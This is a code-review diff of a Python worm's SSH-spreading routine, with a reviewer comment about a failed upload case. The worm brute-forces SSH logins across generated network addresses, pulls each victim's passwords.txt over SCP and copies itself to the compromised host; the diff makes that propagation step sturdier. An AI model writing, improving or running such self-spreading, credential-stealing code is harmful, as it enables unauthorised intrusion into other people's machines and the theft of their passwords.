worm/worm.py

```diff
@@ -57,27 +57,35 @@ def spread_via_ssh(self):
 
         for remote_address in self.generate_addresses_on_network():
             logging.debug('Trying to spread on the remote host: {}'.format(remote_address))
+            print()
+
             for user, passw in self.credentials:
                 try:
                     ssh.connect(remote_address, port=22, username=user, password=passw, timeout=10)
                     logging.debug('The worm is succesfully connected to the remote host [{}, {}].'.format(user, passw))
 
                     # Create SCP client for file transmission.
-                    scp_client = scp.SCPClient(ssh.get_transport())
-                    # Obtain file with victim's passwords.
-                    try:
-                        scp_client.get('passwords.txt')
-                        logging.debug('The victim had passwords.txt')
-                    except Exception:
-                        logging.debug('The victim did not have passwords.txt')
-
-                    # Upload worm to the remote host.
-                    scp_client.put(sys.argv[0])
-                    print()
+                    with scp.SCPClient(ssh.get_transport()) as scp_client:
+                        # Obtain file with victim's passwords.
+                        try:
+                            scp_client.get('passwords.txt')
+                            logging.debug('The victim had passwords.txt')
+                        except Exception:
+                            logging.debug('The victim did not have passwords.txt')
+
+                        # Upload worm to the remote host.
+                        try:
```

Comment:
Sometimes, the ssh connection will succeed, but scp put will fail. Previously, when scp put failed, the error message `The remote host refused connection with credentials ...` would be printed.